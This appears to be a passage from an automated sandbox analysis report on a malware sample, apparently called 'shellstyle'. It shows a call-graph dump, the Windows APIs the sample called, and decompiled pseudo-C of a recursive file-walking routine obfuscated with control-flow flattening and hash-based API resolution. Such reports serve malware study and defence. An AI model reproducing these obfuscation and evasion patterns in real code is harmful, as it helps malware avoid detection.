3d4220 GetPEB 6550->6551 6590 3d56f0 6550->6590 6599 3d2980 6550->6599 6551->6550 6554 3d4eb6 6553->6554 6554->6554 6555 3d4f3d 6554->6555 6556 3d3f00 GetPEB 6554->6556 6557 3d3e60 GetPEB 6554->6557 6555->6163 6556->6554 6557->6554 6574 3d191f 6558->6574 6559 3d1bc6 6560 3d35c0 GetPEB 6559->6560 6562 3d1bd0 6560->6562 6561 3d1ba4 6561->6163 6563 3d1bf1 6562->6563 6564 3d3f00 GetPEB 6562->6564 6568 3d1c23 6563->6568 6570 3d3f00 GetPEB 6563->6570 6566 3d1be5 6564->6566 6565 3d3e60 GetPEB 6565->6574 6569 3d3e60 GetPEB 6566->6569 6567 3d4e30 GetPEB 6567->6574 6575 3d3f00 GetPEB 6568->6575 6579 3d1c4b 6568->6579 6569->6563 6571 3d1c17 6570->6571 6573 3d3e60 GetPEB 6571->6573 6572 3d3f00 GetPEB 6572->6574 6573->6568 6574->6559 6574->6561 6574->6565 6574->6567 6574->6572 6612 3d35c0 6574->6612 6576 3d1c3f 6575->6576 6577 3d3e60 GetPEB 6576->6577 6577->6579 6579->6163 6581 3d422d 6580->6581 6584 3d4243 6580->6584 6582 3d3f00 GetPEB 6581->6582 6583 3d4237 6582->6583 6585 3d3e60 GetPEB 6583->6585 6586 3d3f00 GetPEB 6584->6586 6588 3d426b 6584->6588 6585->6584 6587 3d425f 6586->6587 6589 3d3e60 GetPEB 6587->6589 6588->6167 6589->6588 6598 3d5701 6590->6598 6591 3d57e3 6592 3d5723 6591->6592 6594 3d3f00 GetPEB 6591->6594 6592->6550 6593 3d3f00 GetPEB 6593->6598 6595 3d57f6 6594->6595 6596 3d3e60 GetPEB 6595->6596 6596->6592 6597 3d3e60 GetPEB 6597->6598 6598->6591 6598->6592 6598->6593 6598->6597 6605 3d29a0 6599->6605 6600 3d2abf 6602 3d2b0c 6600->6602 6603 3d2ae4 6600->6603 6604 3d3f00 GetPEB 6600->6604 6601 3d3f00 GetPEB 6601->6605 6602->6550 6603->6602 6609 3d3f00 GetPEB 6603->6609 6606 3d2ad8 6604->6606 6605->6600 6605->6601 6608 3d3e60 GetPEB 6605->6608 6607 3d3e60 GetPEB 6606->6607 6607->6603 6608->6605 6610 3d2b00 6609->6610 6611 3d3e60 GetPEB 6610->6611 6611->6602 6613 3d35e4 6612->6613 6614 3d3609 6613->6614 6615 3d3f00 GetPEB 6613->6615 6618 3d3f00 GetPEB 6614->6618 6621 3d3631 6614->6621 6616 3d35fd 6615->6616 6617 3d3e60 GetPEB 6616->6617 6617->6614 6619 3d3625 6618->6619 6620 3d3e60 GetPEB 6619->6620 6620->6621 6621->6574 6623 3d5516 6622->6623 6628 3d552c 6622->6628 6624 3d3f00 GetPEB 6623->6624 6625 3d5520 6624->6625 6626 3d3e60 GetPEB 6625->6626 6626->6628 6627 3d5586 6627->6201 6628->6627 6629 3d3f00 GetPEB 6628->6629 6630 3d557a 6629->6630 6631 3d3e60 GetPEB 6630->6631 6631->6627 6637 3dab66 6632->6637 6633 3dab8c 6633->6215 6636 3dac52 6639 3d3f00 GetPEB 6636->6639 6642 3dac71 6636->6642 6637->6633 6637->6636 6638 3d3f00 GetPEB 6637->6638 6645 3d3e60 GetPEB 6637->6645 6705 3d4b70 6637->6705 6727 3dacd0 6637->6727 6638->6637 6640 3dac65 6639->6640 6641 3d3e60 GetPEB 6640->6641 6641->6642 6643 3d3f00 GetPEB 6642->6643 6644 3dac99 6642->6644 6646 3dac8d 6643->6646 6644->6215 6645->6637 6647 3d3e60 GetPEB 6646->6647 6647->6644 6668 3da189 6648->6668 6649 3dacd0 GetPEB 6649->6668 6650 3da439 6650->6215 6651 3da552 6652 3da571 6651->6652 6655 3d3f00 GetPEB 6651->6655 6662 3da599 6652->6662 6664 3d3f00 GetPEB 6652->6664 6654 3d34c0 GetPEB 6654->6668 6658 3da565 6655->6658 6656 3d4220 GetPEB 6656->6668 6657 3d3f00 GetPEB 6657->6668 6660 3d3e60 GetPEB 6658->6660 6659 3d4b70 2 API calls 6659->6668 6660->6652 6662->6215 6663 3d3e60 GetPEB 6663->6668 6665 3da58d 6664->6665 6667 3d3e60 GetPEB 6665->6667 6666 3d3460 GetPEB 6666->6668 6667->6662 6668->6649 6668->6650 6668->6651 6668->6654 6668->6656 6668->6657 6668->6659 6668->6663 6668->6666 6737 3db520 6668->6737 6745 3d1150 6668->6745 6687 3da7c5 6669->6687 6670 3dacd0 GetPEB 6670->6687 6671 3daa7c GetCurrentProcessId 6671->6687 6672 3daacd 6674 3daaec 6672->6674 6678 3d3f00 GetPEB 6672->6678 6673 3d4b70 2 API calls 6673->6687 6682 3dab14 6674->6682 6683 3d3f00 GetPEB 6674->6683 6675 3daa19 6675->6215 6680 3daae0 6678->6680 6679 3d42c0 GetPEB 6679->6687 6681 3d3e60 GetPEB 6680->6681 6681->6674 6682->6215 6684 3dab08 6683->6684 6686 3d3e60 GetPEB 6684->6686 6685 3d3f00 GetPEB 6685->6687 6686->6682 6687->6670 6687->6671 6687->6672 6687->6673 6687->6675 6687->6679 6687->6685 6688 3d3e60 GetPEB 6687->6688 6760 3d49a0 6687->6760 6770 3d4850 6687->6770 6688->6687 6698 3da5ef 6689->6698 6690 3da710 6690->6215 6691 3da731 6693 3da750 6691->6693 6695 3d3f00 GetPEB 6691->6695 6701 3da778 6693->6701 6702 3d3f00 GetPEB 6693->6702 6694 3d42c0 GetPEB 6694->6698 6697 3da744 6695->6697 6696 3d3f00 GetPEB 6696->6698 6699 3d3e60 GetPEB 6697->6699 6698->6690 6698->6691 6698->6694 6698->6696 6700 3d3e60 GetPEB 6698->6700 6779 3d4370 6698->6779 6699->6693 6700->6698 6701->6215 6703 3da76c 6702->6703 6704 3d3e60 GetPEB 6703->6704 6704->6701 6706 3d4b98 6705->6706 6707 3d4b82 6705->6707 6710 3d4bd7 CreateProcessW 6706->6710 6712 3d3f00 GetPEB 6706->6712 6708 3d3f00 GetPEB 6707->6708 6709 3d4b8c 6708->6709 6711 3d3e60 GetPEB 6709->6711 6713 3d4bf7 6710->6713 6714 3d4c73 6710->6714 6711->6706 6715 3d4bc6 6712->6715 6716 3d4bff 6713->6716 6719 3d3f00 GetPEB 6713->6719 6724 3d4c33 6713->6724 6714->6637 6717 3d3e60 GetPEB 6715->6717 6716->6637 6718 3d4bd2 6717->6718 6718->6710 6720 3d4c27 6719->6720 6722 3d3e60 GetPEB 6720->6722 6721 3d4c5d 6721->6637 6722->6724 6723 3d3f00 GetPEB 6725 3d4c51 6723->6725 6724->6721 6724->6723 6726 3d3e60 GetPEB 6725->6726 6726->6721 6736 3daced 6727->6736 6728 3daf9f 6730 3daf37 6728->6730 6732 3d3f00 GetPEB 6728->6732 6729 3d34c0 GetPEB 6729->6736 6730->6637 6731 3d3f00 GetPEB 6731->6736 6733 3dafb2 6732->6733 6734 3d3e60 GetPEB 6733->6734 6734->6730 6735 3d3e60 GetPEB 6735->6736 6736->6728 6736->6729 6736->6730 6736->6731 6736->6735 6738 3db536 6737->6738 6739 3db55f 6738->6739 6740 3db633 6738->6740 6742 3d3e60 GetPEB 6738->6742 6743 3db63f 6738->6743 6744 3d3f00 GetPEB 6738->6744 6739->6668 6754 3d4fd0 6740->6754 6742->6738 6743->6668 6744->6738 6753 3d1160 6745->6753 6746 3d124c 6747 3d1244 6746->6747 6748 3d3f00 GetPEB 6746->6748 6747->6668 6749 3d125f 6748->6749 6750 3d3e60 GetPEB 6749->6750 6750->6747 6751 3d3e60 GetPEB 6751->6753 6752 3d3f00 GetPEB 6752->6753 6753->6746 6753->6747 6753->6751 6753->6752 6755 3d4ff9 6754->6755 6756 3d500f 6754->6756 6757 3d3f00 GetPEB 6755->6757 6756->6743 6758 3d5003 6757->6758 6759 3d3e60 GetPEB 6758->6759 6759->6756 6761 3d49c0 6760->6761 6762 3d49ea 6761->6762 6763 3d3f00 GetPEB 6761->6763 6764 3d4b37 6761->6764 6767 3d34c0 GetPEB 6761->6767 6769 3d3e60 GetPEB 6761->6769 6762->6687 6763->6761 6764->6762 6765 3d3f00 GetPEB 6764->6765 6766 3d4b4a 6765->6766 6768 3d3e60 GetPEB 6766->6768 6767->6761 6768->6762 6769->6761 6777 3d4870 6770->6777 6771 3d496e 6773 3d492c 6771->6773 6774 3d3f00 GetPEB 6771->6774 6772 3d3f00 GetPEB 6772->6777 6773->6687 6776 3d4981 6774->6776 6775 3d3e60 GetPEB 6775->6777 6778 3d3e60 GetPEB 6776->6778 6777->6771 6777->6772 6777->6773 6777->6775 6778->6773 6780 3d450e 6779->6780 6781 3d4384 6779->6781 6780->6698 6781->6780 6782 3d3f00 GetPEB 6781->6782 6785 3d43d6 6781->6785 6783 3d43ca 6782->6783 6784 3d3e60 GetPEB 6783->6784 6784->6785 6786 3d3f00 GetPEB 6785->6786 6794 3d44f4 6785->6794 6795 3d4436 6785->6795 6787 3d442a 6786->6787 6788 3d3e60 GetPEB 6787->6788 6788->6795 6789 3d44ba 6799 3d4550 6789->6799 6790 3d3f00 GetPEB 6790->6795 6793 3d3e60 GetPEB 6793->6795 6794->6698 6795->6789 6795->6790 6795->6793 6796 3d3f00 GetPEB 6797 3d44e8 6796->6797 6798 3d3e60 GetPEB 6797->6798 6798->6794 6800 3d456b 6799->6800 6802 3d44d0 6799->6802 6801 3d3e60 GetPEB 6800->6801 6800->6802 6803 3d3f00 GetPEB 6800->6803 6801->6800 6802->6794 6802->6796 6803->6800 6809 3d55c6 6804->6809 6805 3d56a8 6807 3d55e8 6805->6807 6808 3d3f00 GetPEB 6805->6808 6806 3d3f00 GetPEB 6806->6809 6807->6238 6810 3d56bb 6808->6810 6809->6805 6809->6806 6809->6807 6811 3d3e60 GetPEB 6809->6811 6812 3d3e60 GetPEB 6810->6812 6811->6809 6812->6807 6821 3d4ca0 6813->6821 6814 3d3f00 GetPEB 6814->6821 6815 3d4db4 6816 3d4d7c 6815->6816 6817 3d3f00 GetPEB 6815->6817 6816->6238 6819 3d4dc7 6817->6819 6818 3d3e60 GetPEB 6818->6821 6820 3d3e60 GetPEB 6819->6820 6820->6816 6821->6814 6821->6815 6821->6816 6821->6818 6823 3d46d7 6822->6823 6829 3d46ed 6822->6829 6824 3d3f00 GetPEB 6823->6824 6825 3d46e1 6824->6825 6827 3d3e60 GetPEB 6825->6827 6826 3d4760 6826->6246 6827->6829 6828 3d4721 6833 3d4752 6828->6833 6834 3d3f00 GetPEB 6828->6834 6829->6826 6829->6828 6830 3d3f00 GetPEB 6829->6830 6831 3d4715 6830->6831 6832 3d3e60 GetPEB 6831->6832 6832->6828 6833->6246 6835 3d4746 6834->6835 6836 3d3e60 GetPEB 6835->6836 6836->6833 6849 3d25f0 6837->6849 6838 3d2937 6846 3d295f 6838->6846 6848 3d3f00 GetPEB 6838->6848 6839 3d2912 6839->6838 6840 3d3f00 GetPEB 6839->6840 6843 3d292b 6840->6843 6841 3d42c0 GetPEB 6841->6849 6842 3d2771 6842->6270 6845 3d3e60 GetPEB 6843->6845 6844 3d3e60 GetPEB 6844->6849 6845->6838 6846->6270 6847 3d3f00 GetPEB 6847->6849 6850 3d2953 6848->6850 6849->6839 6849->6841 6849->6842 6849->6844 6849->6847 6851 3d3e60 GetPEB 6850->6851 6851->6846 6857 3d1010 6852->6857 6853 3d1105 6855 3d103a 6853->6855 6856 3d3f00 GetPEB 6853->6856 6854 3d3f00 GetPEB 6854->6857 6855->6296 6858 3d1118 6856->6858 6857->6853 6857->6854 6857->6855 6860 3d3e60 GetPEB 6857->6860 6859 3d3e60 GetPEB 6858->6859 6859->6855 6860->6857 6862 3d34c0 GetPEB 6861->6862 6863 3d36c4 6862->6863 6864 3d36e5 6863->6864 6865 3d3f00 GetPEB 6863->6865 6868 3d3f00 GetPEB 6864->6868 6872 3d371a 6864->6872 6866 3d36d9 6865->6866 6867 3d3e60 GetPEB 6866->6867 6867->6864 6869 3d370e 6868->6869 6871 3d3e60 GetPEB 6869->6871 6870 3d3742 6876 3d376e 6870->6876 6877 3d3f00 GetPEB 6870->6877 6871->6872 6872->6870 6873 3d3f00 GetPEB 6872->6873 6874 3d3736 6873->6874 6875 3d3e60 GetPEB 6874->6875 6875->6870 6876->6070 6878 3d3762 6877->6878 6879 3d3e60 GetPEB 6878->6879 6879->6876 6884 3d7712 6880->6884 6881 3d34c0 GetPEB 6881->6884 6882 3d77b3 6886 3d3f00 GetPEB 6882->6886 6887 3d77d2 6882->6887 6883 3d3f00 GetPEB 6883->6884 6884->6881 6884->6882 6884->6883 6885 3d78a3 6884->6885 6890 3d3e60 GetPEB 6884->6890 6885->6375 6888 3d77c6 6886->6888 6887->6375 6889 3d3e60 GetPEB 6888->6889 6889->6887 6890->6884 7120 3d9b60 7128 3d9b80 7120->7128 7121 3d9d96 7123 3d9d12 7121->7123 7124 3d3f00 GetPEB 7121->7124 7122 3d9dd0 GetPEB 7122->7128 7125 3d9da9 7124->7125 7126 3d3e60 GetPEB 7125->7126 7126->7123 7127 3d3f00 GetPEB 7127->7128 7128->7121 7128->7122 7128->7123 7128->7127 7129 3d3e60 GetPEB 7128->7129 7129->7128 7130 3d47e0 7131 3d4c80 GetPEB 7130->7131 7132 3d47f5 7131->7132 6980 3da198 6988 3da189 6980->6988 6981 3dacd0 GetPEB 6981->6988 6982 3da552 6986 3d3f00 GetPEB 6982->6986 6990 3da571 6982->6990 6983 3da439 6984 3d1150 GetPEB 6984->6988 6985 3d34c0 GetPEB 6985->6988 6989 3da565 6986->6989 6987 3d4220 GetPEB 6987->6988 6988->6981 6988->6982 6988->6983 6988->6984 6988->6985 6988->6987 6991 3d4b70 2 API calls 6988->6991 6993 3db520 GetPEB 6988->6993 6995 3d3f00 GetPEB 6988->6995 6998 3d3460 GetPEB 6988->6998 7000 3d3e60 GetPEB 6988->7000 6992 3d3e60 GetPEB 6989->6992 6994 3da599 6990->6994 6996 3d3f00 GetPEB 6990->6996 6991->6988 6992->6990 6993->6988 6995->6988 6997 3da58d 6996->6997 6999 3d3e60 GetPEB 6997->6999 6998->6988 6999->6994 7000->6988 7139 3d1fd8 7145 3d1fd2 7139->7145 7140 3d2212 7141 3d2208 7140->7141 7143 3d4220 GetPEB 7140->7143 7142 3d42c0 GetPEB 7142->7145 7143->7141 7144 3d3f00 GetPEB 7144->7145 7145->7140 7145->7141 7145->7142 7145->7144 7146 3d3e60 GetPEB 7145->7146 7146->7145 7001 3db110 7002 3db124 7001->7002 7003 3d6060 GetPEB 7002->7003 7013 3db1aa 7002->7013 7004 3db136 7003->7004 7005 3d3310 GetPEB 7004->7005 7006 3db14c 7005->7006 7007 3db182 7006->7007 7008 3d3f00 GetPEB 7006->7008 7011 3d3f00 GetPEB 7007->7011 7007->7013 7009 3db176 7008->7009 7010 3d3e60 GetPEB 7009->7010 7010->7007 7012 3db19e 7011->7012 7014 3d3e60 GetPEB 7012->7014 7014->7013 7015 3d6208 7024 3d6202 7015->7024 7016 3d42c0 GetPEB 7016->7024 7017 3d55b0 GetPEB 7017->7024 7018 3d624b 7019 3d4c80 GetPEB 7019->7024 7020 3d3f00 GetPEB 7020->7024 7021 3d6490 7022 3d3e60 GetPEB 7022->7024 7023 3d3f00 GetPEB 7026 3d642d 7023->7026 7024->7016 7024->7017 7024->7018 7024->7019 7024->7020 7024->7022 7024->7026 7025 3d3e60 GetPEB 7025->7026 7026->7021 7026->7023 7026->7025 7027 3d6608 7068 3d65fd 7027->7068 7028 3d94d0 GetPEB 7028->7068 7029 3d6dcd 7038 3db2e0 GetPEB 7029->7038 7030 3d7410 GetPEB 7030->7068 7031 3d8bb0 2 API calls 7031->7068 7032 3d706e 7037 3d8740 3 API calls 7032->7037 7033 3d9f30 GetPEB 7033->7068 7034 3d68df 7035 3d9050 GetPEB 7035->7068 7036 3db1d0 GetPEB 7036->7068 7044 3d7073 7037->7044 7038->7034 7039 3d7061 7042 3d8d40 2 API calls 7039->7042 7040 3d72d0 GetPEB 7040->7068 7041 3d9860 6 API calls 7041->7068 7051 3d7066 7042->7051 7043 3d61e0 GetPEB 7043->7068 7045 3d80a0 3 API calls 7045->7068 7046 3d53d0 GetPEB 7046->7068 7047 3d6f27 GetTickCount 7047->7068 7048 3d9270 GetPEB 7048->7068 7049 3d7120 3 API calls 7049->7068 7050 3d8700 GetPEB 7050->7068 7052 3d4770 2 API calls 7052->7068 7053 3d3310 GetPEB 7053->7068 7054 3d12b0 2 API calls 7054->7068 7055 3db430 3 API calls 7055->7068 7056 3d4220 GetPEB 7056->7068 7057 3d8970 2 API calls 7057->7068 7058 3d8e80 2 API calls 7058->7068 7059 3d6060 GetPEB 7059->7068 7060 3d8400 2 API calls 7060->7068 7061 3d3e60 GetPEB 7061->7068 7062 3d6975 GetTickCount 7062->7068 7063 3d1840 GetPEB 7063->7068 7064 3d9620 2 API calls 7064->7068 7065 3dafe0 GetPEB 7065->7068 7066 3d3460 GetPEB 7066->7068 7067 3d3f00 GetPEB 7067->7068 7068->7028 7068->7029 7068->7030 7068->7031 7068->7032 7068->7033 7068->7034 7068->7035 7068->7036 7068->7039 7068->7040 7068->7041 7068->7043 7068->7045 7068->7046 7068->7047 7068->7048 7068->7049 7068->7050 7068->7052 7068->7053 7068->7054 7068->7055 7068->7056 7068->7057 7068->7058 7068->7059 7068->7060 7068->7061 7068->7062 7068->7063 7068->7064 7068->7065 7068->7066 7068->7067 7069 3d4160 GetPEB 7068->7069 7069->7068 5969 3d3780 5970 3d3795 5969->5970 5971 3d37ab 5969->5971 5972 3d3f00 GetPEB 5970->5972 5975 3d37dd 5971->5975 5976 3d3f00 GetPEB 5971->5976 5973 3d379f 5972->5973 5974 3d3e60 GetPEB 5973->5974 5974->5971 5979 3d3812 5975->5979 5980 3d3f00 GetPEB 5975->5980 5977 3d37d1 5976->5977 5978 3d3e60 GetPEB 5977->5978 5978->5975 5983 3d384a 5979->5983 5984 3d3f00 GetPEB 5979->5984 5981 3d3806 5980->5981 5982 3d3e60 GetPEB 5981->5982 5982->5979 5987 3d3876 5983->5987 5988 3d3f00 GetPEB 5983->5988 5985 3d383e 5984->5985 5986 3d3e60 GetPEB 5985->5986 5986->5983 5991 3d38d1 SHFileOperationW 5987->5991 5992 3d3f00 GetPEB 5987->5992 5989 3d386a 5988->5989 5990 3d3e60 GetPEB 5989->5990 5990->5987 5993 3d38c0 5992->5993 5994 3d3e60 GetPEB 5993->5994 5995 3d38cc 5994->5995 5995->5991 7082 3d2b80 7083 3d2b99 7082->7083 7084 3d2baf 7082->7084 7085 3d3f00 GetPEB 7083->7085 7086 3d2ba3 7085->7086 7087 3d3e60 GetPEB 7086->7087 7087->7084 7147 3d7e40 7155 3d7e50 7147->7155 7148 3d7f83 7150 3d38f0 2 API calls 7148->7150 7149 3d7f7a 7151 3d7f96 7150->7151 7152 3d34c0 GetPEB 7152->7155 7153 3d3e60 GetPEB 7153->7155 7154 3d3f00 GetPEB 7154->7155 7155->7148 7155->7149 7155->7152 7155->7153 7155->7154

                                                                                Executed Functions

                                                                                Function 002C0400, Relevance: 21.1, APIs: 14, Instructions: 132memorynativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 002C0448
                                                                                  • Part of subcall function 002C1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,002C0EFD,00000000), ref: 002C1155
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 002C0463
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 002C0484
                                                                                • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 002C048D
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 002C0492
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 002C049F
                                                                                • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 002C04A6
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 002C04B9
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 002C04E0
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 002C04F7
                                                                                • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 002C0519
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 002C0530
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 002C0547
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 002C0562
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291846754.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2c0000_shellstyle.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 482429597-0
                                                                                • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction ID: 35fd206fab1694501279e58b44ea08515a356d604adebee26b02c671e149b3cb
                                                                                • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction Fuzzy Hash: 2E4171B1924340AEE714EB61C847F6FB3EDAB85740F448E1CB74897182D6B8D9248F62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D38F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 447 3d38f0-3d390b 448 3d3910-3d3915 447->448 449 3d3a69-3d3a6e 448->449 450 3d391b 448->450 451 3d3acc-3d3adf call 3d34c0 449->451 452 3d3a70-3d3a75 449->452 453 3d3a5f-3d3a64 450->453 454 3d3921-3d3926 450->454 468 3d3afc-3d3b17 451->468 469 3d3ae1-3d3af7 call 3d3f00 call 3d3e60 451->469 455 3d3a77-3d3a7e 452->455 456 3d3ab6-3d3abb 452->456 453->448 457 3d392c-3d3931 454->457 458 3d3a17-3d3a1e 454->458 461 3d3a9b-3d3ab1 455->461 462 3d3a80-3d3a96 call 3d3f00 call 3d3e60 455->462 456->448 465 3d3ac1-3d3acb 456->465 466 3d3937-3d393c 457->466 467 3d3b70-3d3b77 457->467 463 3d3a3b-3d3a4f FindFirstFileW 458->463 464 3d3a20-3d3a36 call 3d3f00 call 3d3e60 458->464 461->448 462->461 474 3d3a55-3d3a5a 463->474 475 3d3b97-3d3ba1 463->475 464->463 466->456 476 3d3942-3d3947 466->476 472 3d3b79-3d3b8f call 3d3f00 call 3d3e60 467->472 473 3d3b94 467->473 497 3d3b19-3d3b2f call 3d3f00 call 3d3e60 468->497 498 3d3b34-3d3b3f 468->498 469->468 472->473 473->475 474->448 477 3d394d-3d3953 476->477 478 3d39f1-3d3a12 476->478 484 3d3955-3d395d 477->484 485 3d3974-3d3976 477->485 478->448 491 3d396d-3d3972 484->491 492 3d395f-3d3963 484->492 485->491 494 3d3978-3d398b call 3d34c0 485->494 491->448 492->485 501 3d3965-3d396b 492->501 511 3d398d-3d39a3 call 3d3f00 call 3d3e60 494->511 512 3d39a8-3d39ec call 3d38f0 call 3d3460 494->512 497->498 509 3d3b5c-3d3b6b 498->509 510 3d3b41-3d3b57 call 3d3f00 call 3d3e60 498->510 501->485 501->491 509->448 510->509 511->512 512->448
                                                                                C-Code - Quality: 63%
                                                                                			E003D38F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t33;
				signed int _t34;
				void* _t39;
				intOrPtr* _t42;
				signed int _t46;
				intOrPtr* _t50;
				intOrPtr _t55;
				void* _t56;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t98;

				_t91 = __ecx;
				_t95 = __edx;
				_v1640 = __ecx;
				_t22 = 0x25a25425;
				_t56 = _v1640;
				while(1) {
					L1:
					_t98 = _t22 - 0x25a25425;
					if(_t98 > 0) {
						break;
					}
					if(_t98 == 0) {
						_t22 = 0x29bc40d3;
						continue;
					} else {
						if(_t22 == 0x8a099c9) {
							if( *0x3de430 == 0) {
								 *0x3de430 = E003D3E60(_t56, E003D3F00(0x9bab0b12), 0x83efb111, _t95);
							}
							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
							_t56 = _t39;
							if(_t56 == 0xffffffff) {
								return _t39;
							} else {
								_t22 = 0x1a4f9837;
								continue;
							}
						} else {
							if(_t22 == 0xb46fa16) {
								_t42 =  *0x3ddba4;
								if(_t42 == 0) {
									_t42 = E003D3E60(_t56, E003D3F00(0x9bab0b12), 0xd274268a, _t95);
									 *0x3ddba4 = _t42;
								}
								return  *_t42(_t56);
							}
							if(_t22 != 0x1a4f9837) {
								L27:
								if(_t22 != 0x55fa1f4) {
									continue;
								} else {
									return _t22;
								}
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t46 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L12:
										if(_t95 == 0) {
											goto L11;
										} else {
											_t94 = E003D34C0(0x3dd290);
											_t50 =  *0x3de158;
											if(_t50 == 0) {
												_t50 = E003D3E60(_t56, E003D3F00(0xc6fbcd74), 0xba71dd03, _t95);
												 *0x3de158 = _t50;
											}
											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
											E003D38F0( &_v1044, _t95, _a4, _a8);
											_t96 = _t96 + 0x1c;
											E003D3460(_t94);
											_t22 = 0x36cb81de;
										}
									} else {
										_t55 = _v1590;
										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
											L11:
											_t22 = 0x36cb81de;
										} else {
											goto L12;
										}
									}
								}
								continue;
							}
						}
					}
					L40:
				}
				if(_t22 == 0x29bc40d3) {
					_t93 = E003D34C0(0x3dd260);
					_t24 =  *0x3de158;
					if(_t24 == 0) {
						_t24 = E003D3E60(_t56, E003D3F00(0xc6fbcd74), 0xba71dd03, _t95);
						 *0x3de158 = _t24;
					}
					 *_t24( &_v524, 0x104, _t93, _t91);
					_t26 =  *0x3de494;
					_t96 = _t96 + 0x10;
					if(_t26 == 0) {
						_t26 = E003D3E60(_t56, E003D3F00(0x9bab0b12), 0x7facde30, _t95);
						 *0x3de494 = _t26;
					}
					_t92 =  *_t26();
					_t28 =  *0x3ddf30;
					if(_t28 == 0) {
						_t28 = E003D3E60(_t56, E003D3F00(0x9bab0b12), 0x5010a54d, _t95);
						 *0x3ddf30 = _t28;
					}
					 *_t28(_t92, 0, _t93);
					_t91 = _v1652;
					_t22 = 0x8a099c9;
					goto L1;
				} else {
					if(_t22 != 0x36cb81de) {
						goto L27;
					} else {
						_t33 =  *0x3ddf88;
						if(_t33 == 0) {
							_t33 = E003D3E60(_t56, E003D3F00(0x9bab0b12), 0xa53a5b1a, _t95);
							 *0x3ddf88 = _t33;
						}
						_t34 =  *_t33(_t56,  &_v1636);
						asm("sbb eax, eax");
						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
						goto L1;
					}
				}
				goto L40;
			}































                                                                                0x003d38fa
                                                                                0x003d38fc
                                                                                0x003d38fe
                                                                                0x003d3902
                                                                                0x003d3907
                                                                                0x003d3910
                                                                                0x003d3910
                                                                                0x003d3910
                                                                                0x003d3915
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003d391b
                                                                                0x003d3a5f
                                                                                0x00000000
                                                                                0x003d3921
                                                                                0x003d3926
                                                                                0x003d3a1e
                                                                                0x003d3a36
                                                                                0x003d3a36
                                                                                0x003d3a48
                                                                                0x003d3a4a
                                                                                0x003d3a4f
                                                                                0x003d3ba1
                                                                                0x003d3a55
                                                                                0x003d3a55
                                                                                0x00000000
                                                                                0x003d3a55
                                                                                0x003d392c
                                                                                0x003d3931
                                                                                0x003d3b70
                                                                                0x003d3b77
                                                                                0x003d3b8a
                                                                                0x003d3b8f
                                                                                0x003d3b8f
                                                                                0x00000000
                                                                                0x003d3b95
                                                                                0x003d393c
                                                                                0x003d3ab6
                                                                                0x003d3abb
                                                                                0x00000000
                                                                                0x003d3acb
                                                                                0x003d3acb
                                                                                0x003d3acb
                                                                                0x003d3942
                                                                                0x003d3947
                                                                                0x003d39fd
                                                                                0x003d3a06
                                                                                0x003d3a0d
                                                                                0x003d394d
                                                                                0x003d3953
                                                                                0x003d3974
                                                                                0x003d3976
                                                                                0x00000000
                                                                                0x003d3978
                                                                                0x003d3982
                                                                                0x003d3984
                                                                                0x003d398b
                                                                                0x003d399e
                                                                                0x003d39a3
                                                                                0x003d39a3
                                                                                0x003d39bc
                                                                                0x003d39d8
                                                                                0x003d39dd
                                                                                0x003d39e2
                                                                                0x003d39e7
                                                                                0x003d39e7
                                                                                0x003d3955
                                                                                0x003d3955
                                                                                0x003d395d
                                                                                0x003d396d
                                                                                0x003d396d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003d395d
                                                                                0x003d3953
                                                                                0x00000000
                                                                                0x003d3947
                                                                                0x003d393c
                                                                                0x003d3926
                                                                                0x00000000
                                                                                0x003d391b
                                                                                0x003d3a6e
